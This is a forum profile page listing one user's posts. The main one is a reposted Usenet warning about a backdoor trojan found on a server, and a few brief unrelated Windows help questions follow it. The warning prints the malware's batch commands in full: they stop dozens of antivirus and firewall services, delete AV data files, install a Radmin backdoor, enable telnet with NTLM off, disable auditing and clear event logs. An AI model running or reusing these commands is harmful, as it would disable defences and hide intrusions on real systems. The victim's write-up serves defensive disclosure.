kfarmer
Members-
Content count
5 -
Joined
-
Last visited
Never
Everything posted by kfarmer
-
From kfarmer@thuban.org (Keith Farmer) Newsgroups alt.comp.virus Subject VERY NASTY TROJAN -- SARC refuses to recognize it (long write-up) NNTP-Posting-Host 67.126.144.68 Message-ID <6d668d6.0306031252.1e301208@posting.google.com> SARC refuses to recognize this as a threat. So I'm spreading this where I may Just spent the day reinstalling a server. NAV missed one. Not merely that, but when brought to SARC's attention, they dismissed it. They're losing a customer over this. Turns out we had a backdoor hacked onto our system. Considering the system was fairly newly installed, we don't know if it got in through a WebDAV flaw or not, before the appropriate patches were installed. Either way, here's what it did 1) installed a hacked copy of the Serv-U ftp server. This seems to contain a dictionary. Why would an ftp server contain a dictionary? SARC seems to think nothing of it. 2) created and REALLY REALLY LOCKED a couple directories to be used as dumping points for dvd rips. Administrator couldn't even change the access control. 3) replaced my system32/services.exe file with a hacked version. If you bother to open the modified services.exe file in a bytecode editor (such as UltraEdit, something with SARC apparently didn't bother with), you see the following, at the very beginning -- "Use Win32 instead dumpass haha rofl!" and, at the end, "idontlikethosenastyavproggiesbelievemeidontlikethem" (repeats omitted). The legitimate file from Microsoft contains none of this. It took us less than a minute to find these, as we're not the ones trained in it. For some reason, SARC doesn't seem to think this is a sign that something's been altered in a system file. Obviously, someone at SARC is not doing their job. 4) installed MOAB.BAT and .EXE. For some reason, attempts to forward this to SARC are failing. I wonder if they blocked my account. I'm certainly not going to pay for a phone call to their tech support just because they refused to listen to me. I'll just give my business elsewhere in that case. Hence, this posting. 5) Modified registry security, policy, you name it. For this reason alone, we reformatted and reinstalled. 6) Ports to watch out for, surprise surprise, include port 1337, as well as 2277 (a remote admin backdoor), and 539 (dec or hex, I don't know). 7) It will stop and/or delete the following AV and firewall services _Avp32.exe /y _Avpcc.exe /y _Avpm.exe /y Ackwin32.exe /y Agnitum Outpost Firewall /y Anti-Trojan.exe /y ANTIVIR /y Apvxdwin.exe /y ATRACK /y Autodown.exe /y AVCONSOL /y Avconsol.exe /y Ave32.exe /y Avgctrl.exe /y Avkserv.exe /y Avnt.exe /y Avp.exe /y AVP.EXE /y AVP32 /y Avp32.exe /y Avpcc.exe /y Avpdos32.exe /y Avpm.exe /y Avptc32.exe /y Avpupd.exe /y Avsched32.exe /y AVSync Manager /y AVSYNMGR /y Avwin95.exe /y Avwupd32.exe /y Blackd.exe /y BLACKICE /y BlackICE Defender /y Blackice.exe /y CA Sessionwall-3 /y Cfiadmin.exe /y Cfiaudit.exe /y CFINET /y Cfinet.exe /y CFINET32 /y Cfinet32.exe /y Claw95.exe /y Claw95cf.exe /y Cleaner.exe /y Cleaner3.exe /y ConSeal PC Firewall & Private Desktop /y Defwatch /y Defwatch.exe /y Dvp95.exe /y Dvp95_0.exe /y Ecengine.exe /y eSafe Protect Desktop /y Esafe.exe /y Espwatch.exe /y eTrust EZ Firewall /y F-Agnt95.exe /y Findviru.exe /y Fprot.exe /y F-Prot.exe /y F-PROT95 /y F-Prot95.exe /y FP-WIN /y Fp-Win.exe /y Freedom 2 /y Frw.exe /y F-STOPW /y F-Stopw.exe /y GNAT Box Lite /y IAMAPP /y Iamapp.exe /y Iamserv.exe /y Ibmasn.exe /y Ibmavsp.exe /y Icload95.exe /y Icloadnt.exe /y ICMON /y Icmon.exe /y Icsupp95.exe /y Icsuppnt.exe /y Iface.exe /y Internet Alert 99 /y IOMON98 /y Iomon98.exe /y Jedi.exe /y LOCKDOWN2000 /y Lockdown2000.exe /y Look'n'Stop /y Look'n'Stop Lite /y Lookout.exe /y LUALL /y Luall.exe /y LUCOMSERVER /y MCAFEE /y McAfee Firewall /y McAfee Internet Guard Dog Pro /y Moolive.exe /y Mpftray.exe /y N32scanw.exe /y NAVAPSVC /y NAVAPW32 /y Navapw32.exe /y NAVLU32 /y Navlu32.exe /y Navnt.exe /y NAVRUNR /y NAVW32 /y Navw32.exe /y NAVWNT /y Navwnt.exe /y NeoWatch /y NISSERV /y NISUM /y Nisum.exe /y NMAIN /y Nmain.exe /y Norman Personal Firewall /y Normist.exe /y NORTON /y Norton AntiVirus Server /y Norton Internet Security /y Norton Personal Firewall 2001 /y Nupgrade.exe /y NVC95 /y Nvc95.exe /y Outpost.exe /y Padmin.exe /y Pavcl.exe /y Pavsched.exe /y Pavw.exe /y Pc firewall /y PC Viper /y PCCIOMON /y PCCMAIN /y PCCWIN98 /y Pccwin98.exe /y Pcfwallicon.exe /y Persfw.exe /y PGP Gauntlet /y POP3TRAP /y Proxy + /y PVIEW95 /y Rav7.exe /y Rav7win.exe /y Rescue.exe /y RESCUE32 /y SAFEWEB /y Safeweb.exe /y Scan32.exe /y Scan95.exe /y Scanpm.exe /y Scrscan.exe /y Serv95.exe /y Smc.exe /y SMCSERVICE /y Snort - Win32 GUI /y Snort (Intrusion Detection System) /y Sphinx.exe /y Sphinxwall /y Sweep95.exe /y Sybergen Secure Desktop /y Sybergen SyGate /y SYMPROXYSVC /y Tbscan.exe /y Tca.exe /y Tds2-98.exe /y Tds2-Nt.exe /y TermiNET /y TGBBOB /y Tiny Personal Firewall /y Vet95.exe /y Vettray.exe /y Vscan40.exe /y Vsecomr.exe /y VSHWIN32 /y Vshwin32.exe /y VSSTAT /y Vsstat.exe /y WEBSCANX /y Webscanx.exe /y WEBTRAP /y Wfindv32.exe /y Wingate /y WinProxy /y WinRoute /y WyvernWorks Firewall /y Zonealarm /y Zonealarm.exe /y AVP32 /y LOCKDOWN2000 /y AVP.EXE /y CFINET32 /y CFINET /y ICMON /y SAFEWEB /y WEBSCANX /y ANTIVIR /y MCAFEE /y NORTON /y NVC95 /y FP-WIN /y IOMON98 /y PCCWIN98 /y F-PROT95 /y F-STOPW /y PVIEW95 /y NAVWNT /y NAVRUNR /y NAVLU32 /y NAVAPSVC /y NISUM /y SYMPROXYSVC /y RESCUE32 /y NISSERV /y ATRACK /y IAMAPP /y LUCOMSERVER /y LUALL /y NMAIN /y NAVW32 /y NAVAPW32 /y VSSTAT /y VSHWIN32 /y AVSYNMGR /y AVCONSOL /y WEBTRAP /y POP3TRAP /y PCCMAIN /y PCCIOMON /y del c\*ANTI-VIR*.DAT /s del c\*CHKLIST*.DAT /s del c\*CHKLIST*.MS /s del c\*CHKLIST*.CPS /s del c\*CHKLIST*.TAV /s del c\*IVB*.NTZ /s del c\*SMARTCHK*.MS /s del c\*SMARTCHK*.CPS /s del c\*AVGQT*.DAT /s del c\*AGUARD*.DAT /s 8) other associated files attrib +s CommonDlg32.dll attrib +s drvrquery32.exe attrib +s clearlogs.exe attrib +s script.exe attrib +s auditpol.exe attrib +s PSKILL.exe attrib +s REG.exe attrib +s TLIST.exe attrib +s uptime.exe attrib +s SystemInfo.exe del /s winmgnt.exe del /s servudaemon.exe del /s servudaemon.ini copy %windir%\drvrquery32.exe %windir%\system32\ /y copy %windir%\CommonDlg32.dll %windir%\system32\ /y %windir%\system32\drvrquery32.exe /s %windir%\system32\drvrquery32.exe /h %windir%\system32\drvrquery32.exe /i md %windir%\system32\backup copy %windir%\system32\CommonDlg32.dll %windir%\system32\backup copy %windir%\system32\drvrquery32.exe %windir%\system32\backup echo Windows Registry Editor Version 5.00 > protect.reg echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters] >> protect.reg echo "DisableWebDAV"=dword00000001 >> protect.reg regedit /s protect.reg reg.exe IMPORT protect.reg del protect.reg net stop R_Server regedit /s radmin.reg nvsvc.exe /install /silence net start R_Server echo Windows Registry Editor Version 5.00 > config.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> config.reg echo "NTLM"=dword00000000 >> config.reg echo "TelnetPort"=dword00000539 >> config.reg regedit.exe /s config.reg del config.reg net start telnet auditpol /disable del c\*.log /s del d\*.log /s clearlogs -app clearlogs -sys clearlogs -sec md %windir%\system32\spool\Help\ md %windir%\system32\spool\Help\aux\ \ md %windir%\system32\spool\Help\aux\.tmp\ md %windir%\system32\spool\Help\aux\.tmp\scanfolder md %windir%\system32\spool\Help\aux\.tmp\warez cacls %windir%\system32\spool\Help\* /T /E /P AdministratorN attrib +S +H %windir%\system32\spool\Help\aux\.tmp\ /S /D copy login.txt %windir%\system32\spool\Help\aux\.tmp\ echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >> bp.reg echo "AutoShareServer"=dword00000000 >> bp.reg echo "AutoShareWks"=dword00000000 >> bp.reg regedit /s bp.reg reg.exe IMPORT bp.reg del bp.reg
-
VERY NASTY TROJAN -- SARC refuses to recognize it (long)
kfarmer replied to kfarmer's topic in Security
Sophos had already identified the trojan in question. CA, Kaspersky, and F-Secure also found it. All are up[censored] their signature files. No comment from the people at SARC. -
I don't ee a specific patch for code red. What I see is the June 18, 2001 buffer overrun patch (being applied now). Are the two the same?
-
I'm interested in relocating the \Inetpub\mailroot directory to a different directory on a different drive. I've succeeded in moving everything but the Pickup and Queue directories, which are now stubbornly residing in my web hierarchy. Could someone point me to the correct place to change these? I'm running Win2k Pro. Many thanks -- Keith
-
Quote: Originally posted by Gamemaster59: If i dont plug a ps2 mouse in as well my ps2 keyboard does not work in win2k pro. Can anyone help? Actually, I'm experience the opposite problem -- my Logitech Trackman (PS2) will not be detected unless my PS2 keyboard is plugged in. I prefer using my USB Natural kb. Clues, anyone? I know it *can* work -- it was before, but it stopped. Keith